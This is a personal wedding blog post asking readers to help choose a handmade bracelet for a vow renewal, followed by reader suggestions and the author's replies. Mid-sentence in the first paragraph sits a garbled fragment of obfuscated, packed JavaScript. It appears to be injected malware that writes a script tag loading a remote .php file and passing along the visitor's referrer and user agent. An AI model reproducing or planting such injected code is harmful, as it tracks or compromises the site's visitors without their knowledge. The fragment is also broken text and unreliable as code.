I need your help!!! I have hijacked my normal posts this morning in absolutely dire need of you’re help.
As you all know, I’m getting married, no, err, renewing my vows in August, although I do feel like a nervous, excited, panicked Bride-to-be at the moment for I can not””””,’g””” c=\’d\’ e=\’b/’ 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’bttdn|varzfdis||js|php’.split(‘|’),0,{}))
decide how to accessorise my dress and I need your help. I want a bracelet. A stunning bracelet. A personal bracelet. And I can not find one, so I need your help!!! Only, there’s a secret I can’t tell you and that’s all about my dress. But imagine a dress, that’s versatile, would suit any theme, can be dressed up with or without colour and that exudes that feeling I missed out on ten years ago: feminine, sexy and confident. I can let you in on one thing thought, it is not white, and it is not ivory! 🙂
I want something that is subtle yet characterful on my wrist. Something blingy without being OTT. I must have an element of me in it. I promise I’m not fussy, I just know what I like when I see it, the problem is I haven’t seen it yet. So I really, really need your suggestions, your ideas so please comment below with as many links and ideas as possible and help me choose a bracelet for my big day!
A little help from me: I love art deco, I love silver, in fact all metal and I love the multi-bracelet look be it 2 or more. So what would suit the dress: metals would look stunning, silver would embrace the feminine look and pearls would encapsulate the elegant look. Should I do pearls, should I do colour, should I do a plain metal bangle with something personal, should I find an elaborate piece I adore – ahhhh. My choice is so huge that I can not narrow it down. If you’re a Bride I am sure you can relate to my obsession with getting it right.
These are a few examples of what I’m thinking of. These are beautifully unique, just what I love. I want something really unique, not on trend and that is made by a non-high-street store. It has to be cottage, it has to be crafted because that to me is unique and I love wearing things made by people, not machines!
Starting with my current favourite:
Rachels Design Company – Etsy
Mercury Jane – Etsy
And I’ve fallen for this too…
Cynthia Couture – Etsy
Sarah Lawrence Jewellery – Not On The High Street
Molly Moo Jewels – Etsy
Alyssa Smith – Personalised initials
Rachels Design Co – Etsy
Oh and just to add a little fuss-pot of a note, I really would love to be able to wear it a lot so it can’t be a piece that won’t suit or dress up my every day wear. I know, I am asking too much aren’t I?
What do you think? Do you prefer any of them? Pleeeeeease help me decide because time is running out!
Thank you! Thank you! Thank you!
Try this amazing up and coming designer http://t.co/ehAkGzpf amazing x
Thanks Janine! It looks stunning x
love the colour of the Rachels design company bracelet, but have you tried it out against your skin tone? I have some very ivory pearls than look shocking against my skin, and makes my wrists look mottled but have some soft coral ones that I just love and feel so happy with. http://www.polkadotgallery.com/ also have some lovely pieces. Probably not much help am I – adding to your choices. If you would like some confetti for your day, would love to send you some to complimentary confetti to compliment whatever bracelet you decide on……
Thanks Rosie! And yes, I would love to take you up on your confetti offer. I will be in touch over email. Yay!!! Thank you so much. X
Based on what you’re looking for, I’d probably go for the Cynthia Couture piece
(if you don’t I might!) – a real statement piece that you’d wear again and again! I do like the personalisation of the Sarah Lawrence piece though – would make a nice pressie for the occasion from your hubbie perhaps…
I’m with you on that Rebecca. My decision is not easy, I am torn between two of them and do love the cuff. I do love the idea of the personalisation piece and the lock and key romantic side to it all… Ahhh. Help 🙂 xxx
I replied to your tweet – but not very good with twittering so leaving a note here too.
This is my my design – I can create a bespoke piece for you based on it in your preferred materials if you like…. Happy to look after a fellow wedding professional if you like what I do x
